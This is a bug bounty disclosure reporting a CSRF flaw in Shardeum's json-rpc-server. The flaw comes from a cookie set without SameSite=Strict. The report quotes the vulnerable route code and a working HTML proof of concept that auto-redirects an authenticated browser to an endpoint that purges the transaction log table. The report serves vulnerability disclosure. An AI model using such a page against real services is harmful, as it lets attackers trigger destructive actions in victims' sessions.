Boost _ Shardeum_ Ancillaries 34367 - [Websites and Applications - Low] CSRF vulnerability due to missing SameSiteStrict attribute resulting blackhat to perform authenticated action

Submitted on Sat Aug 10 2024 12:56:34 GMT-0400 (Atlantic Standard Time) by @hulkvision for Boost | Shardeum: Ancillaries

Report ID: #34367

Report type: Websites and Applications

Report severity: Low

Target: https://github.com/shardeum/json-rpc-server/tree/dev

Impacts:

• CSRF vulnerability allowing blackhat to perform authenticated actions

• Changing sensitive details of other users (including modifying browser local storage) without already-connected wallet interaction and with up to one click of user interaction, such as: Email, Password of the victim etc.

Description

Brief/Intro

The access-token was missing SameSite=Strict attribute which leads to CSRF vulnerability resulting in allowing BlackHat to perform authenticated actions.

Vulnerability Details

In src/routes/authenticate.ts

router.route('/:passphrase').get(async function (req: Request, res: Response) {
  const { passphrase } = req.params
  const payload = { user: 'shardeum-dev' }
  if (passphrase === CONFIG.passphrase) {
    // token don't expire, usually this is bad practice
    // for the case being implementing refresh token is overkill
    // stolen token worst case scenario our debug data ended up being not useful.
    const token = jwt.sign(payload, CONFIG.secret_key)
    res.cookie('access_token', token, {
      httpOnly: false,
      maxAge: 1000 * 60 * 60 * 700, // ~ a month
    })
    return res.send({ token: token, message: 'authenticated and authorized for debug api calls' }).status(200)
  }
  return res.send({ message: 'wrong passphrase' }).status(400)
})

After authenticating the rpc server does not define SameSite=Strict cookie restriction, which results in allowing malicious websites to call authenticated GET API which perform actions like purging tables,modifying config values, node subscription etc.

Impact Details

• The vulnerability allows malicious websites performing actions like purging tables,modifying config values, node subscription etc.

• The vulnerability could result in deletion of debug data.

References

https://github.com/shardeum/json-rpc-server/blob/d799a64c1ab4a7cffdf472a8be689fe7afb993e9/src/routes/authenticate.ts#L15-L18

Proof of concept

Proof of Concept

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>csrf performing authenticated action</title>
</head>
<body>
	<h1> calling /log/cleanTxTable which will trigger purging of table that store transaction logging </h1>
	<a href="http://127.0.0.1:8888/log/cleanTxTable"> click here to attack </a>
</body>

<script type="text/javascript">
	function callAutomatically() {
        document.location = 'http://127.0.0.1:8888/log/cleanTxTable';
    }

    setTimeout(callAutomatically,3000);

</script>
</html>

Steps to Reproduce

1. Authenticate to RPC server with password

2. Save the poc file as csrfpoc.html

3. Open csrfpoc.html from the browser you have authenticated with RPC server.

4. Either click on Click here to attack or wait 3 second for attack to happen automatically

5. You will see a response {"success":true}